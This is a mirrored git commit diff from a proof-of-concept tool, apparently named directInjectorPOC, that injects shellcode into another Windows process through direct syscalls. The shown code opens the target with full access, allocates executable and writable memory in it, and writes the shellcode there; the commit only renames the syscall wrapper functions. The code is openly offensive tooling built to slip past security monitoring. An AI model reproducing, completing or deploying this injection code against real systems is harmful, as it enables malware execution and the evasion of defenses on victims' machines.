mirror of
https://github.com/badBounty/directInjectorPOC
synced 2026-08-09 12:25:38 +00:00
.
This commit is contained in:
@@ -98,7 +98,7 @@ namespace directInjectorPOC
|
||||
|
||||
IntPtr bufferReal = IntPtr.Zero;
|
||||
IntPtr procHandle = IntPtr.Zero;
|
||||
syscalls.ZwOpenProcess10(ref procHandle, nativeStructs.ProcessAccessFlags.All, new nativeStructs.OBJECT_ATTRIBUTES(), ref clientid, os);
|
||||
syscalls.ZwOpenProcess(ref procHandle, nativeStructs.ProcessAccessFlags.All, new nativeStructs.OBJECT_ATTRIBUTES(), ref clientid, os);
|
||||
IntPtr remoteAddr = new IntPtr();
|
||||
|
||||
switch (method)
|
||||
@@ -107,12 +107,12 @@ namespace directInjectorPOC
|
||||
Console.WriteLine("[+] Using ALLOCWRITE method to allocate our shellcode in the remote process");
|
||||
UIntPtr sz = new UIntPtr(Convert.ToUInt32(shellcode.Length));
|
||||
|
||||
syscalls.NtAllocateVirtualMemory10(procHandle, ref remoteAddr, new IntPtr(0), ref sz, nativeStructs.MEM_COMMIT | nativeStructs.MEM_RESERVE, nativeStructs.PAGE_EXECUTE_READWRITE, os);
|
||||
syscalls.NtAllocateVirtualMemory(procHandle, ref remoteAddr, new IntPtr(0), ref sz, nativeStructs.MEM_COMMIT | nativeStructs.MEM_RESERVE, nativeStructs.PAGE_EXECUTE_READWRITE, os);
|
||||
|
||||
IntPtr written = IntPtr.Zero;
|
||||
IntPtr unmanagedPointer = Marshal.AllocHGlobal(shellcode.Length);
|
||||
Marshal.Copy(shellcode, 0, unmanagedPointer, shellcode.Length);
|
||||
syscalls.ZwWriteVirtualMemory10(procHandle, ref remoteAddr, unmanagedPointer, Convert.ToUInt32(shellcode.Length), ref written, os);
|
||||
syscalls.ZwWriteVirtualMemory(procHandle, ref remoteAddr, unmanagedPointer, Convert.ToUInt32(shellcode.Length), ref written, os);
|
||||
|
||||
break;
|
||||
case OPENSEC:
|
||||
|
||||
@@ -127,7 +127,7 @@ namespace directInjectorPOC
|
||||
}
|
||||
};
|
||||
|
||||
public static NTSTATUS ZwOpenProcess10(ref IntPtr hProcess, ProcessAccessFlags processAccess, OBJECT_ATTRIBUTES objAttribute, ref CLIENT_ID clientid, string os)
|
||||
public static NTSTATUS ZwOpenProcess(ref IntPtr hProcess, ProcessAccessFlags processAccess, OBJECT_ATTRIBUTES objAttribute, ref CLIENT_ID clientid, string os)
|
||||
{
|
||||
byte[] syscall = syscallSkeleton;
|
||||
syscall[4] = sysDic[os]["openprocess"];
|
||||
@@ -180,7 +180,7 @@ namespace directInjectorPOC
|
||||
}
|
||||
}
|
||||
|
||||
public static NTSTATUS ZwWriteVirtualMemory10(IntPtr hProcess, ref IntPtr lpBaseAddress, IntPtr lpBuffer, uint nSize, ref IntPtr lpNumberOfBytesWritten, string os)
|
||||
public static NTSTATUS ZwWriteVirtualMemory(IntPtr hProcess, ref IntPtr lpBaseAddress, IntPtr lpBuffer, uint nSize, ref IntPtr lpNumberOfBytesWritten, string os)
|
||||
{
|
||||
byte[] syscall = syscallSkeleton;
|
||||
syscall[4] = sysDic[os]["writevirtualmem"];
|
||||
@@ -206,7 +206,7 @@ namespace directInjectorPOC
|
||||
}
|
||||
|
||||
|
||||
public static NTSTATUS NtAllocateVirtualMemory10(IntPtr hProcess, ref IntPtr BaseAddress, IntPtr ZeroBits, ref UIntPtr RegionSize, ulong AllocationType, ulong Protect, string os)
|
||||
public static NTSTATUS NtAllocateVirtualMemory(IntPtr hProcess, ref IntPtr BaseAddress, IntPtr ZeroBits, ref UIntPtr RegionSize, ulong AllocationType, ulong Protect, string os)
|
||||
{
|
||||
byte[] syscall = syscallSkeleton;
|
||||
syscall[4] = sysDic[os]["allocatevirtualmem"];
|
||||
|
||||
Reference in New Issue
Block a user